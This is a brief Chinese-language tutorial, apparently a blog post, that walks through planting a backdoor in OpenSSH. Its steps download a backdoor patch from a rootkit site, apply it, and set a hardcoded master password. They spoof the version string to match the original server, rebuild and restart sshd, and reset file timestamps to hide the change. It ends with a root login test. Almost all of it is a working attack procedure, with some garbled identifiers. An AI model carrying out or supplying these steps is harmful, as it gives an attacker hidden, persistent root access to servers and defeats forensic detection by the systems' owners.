1.ssh -V
#查看當前的ssh版本信息
#OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010
2.查找ssh的配置文件
一般都在/etc/ssh中
3.備份原來的文件的time
將/etc/ssh下的文件的備份
假設/etc/ssh/sshd_config 備份爲/etc/ssh/sshd_config.old
4.wget存在後門的ssh
#http://core.ipsecs.com/rootkit/patch-to-hack/(已被牆) 後門
#http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/ 正規的ssh源文件
#openssh-5.9p1.tar(正規文件)
#openssh-5.9p1.path.tar(後門文件)
5.tar zxf openssh-5.9p1.tar
tar zxf openssh-5.9p1.path.tar
cp openssh-5.9p1.patch/sshbd5.9p1.diff /openssh-5.9p1
cd openssh-5.9p1
patch < sshbd5.9p1.diff
6.修改ssh信息
vi inculdes.h
##define SECRETPW “sky” 後門的密碼
vi version.h
#define SSH_VERSION “OpenSSH_5.8p1 Debian-1ubuntu3” #修改爲第一步ssh -V 查看到的信息
#define SSH_PORTABLE “p1”
7.源碼編譯
yum install -y openssl openssl-devel pam-devel
./configure –prefix=/usr –sysconfdir=/etc/ssh –with-pam –with-kereros5
#–sysconfdir=/etc/ssh 是在第二步查找的路徑
#如果不設定和源文件的路徑
#strings /usr/sbin/sshd | grep etc
#就可以看出問題!!!
編譯過程中可能出現的報錯:
configure: error: *** zlib.h missing – please install first or check config.log
#
#yum install zlib-devel
configure: error: *** Can’t find recent OpenSSL libcrypto (see config.log for details) ***
#
#yum install openssl openssl-devel
make && make install
/etc/init.d/sshd restart
7.還原原來ssh文件的time
修改文件的修改時間(mtime)
touch -r /etc/ssh/sshd_config.old /etc/ssh/config 等等
8.測試
ssh root@localhost
輸入剛纔設定的後門的密碼,如果登錄成功,表示設定ok!
參考:http://gov.com.im/art_design/2013/0616/378.html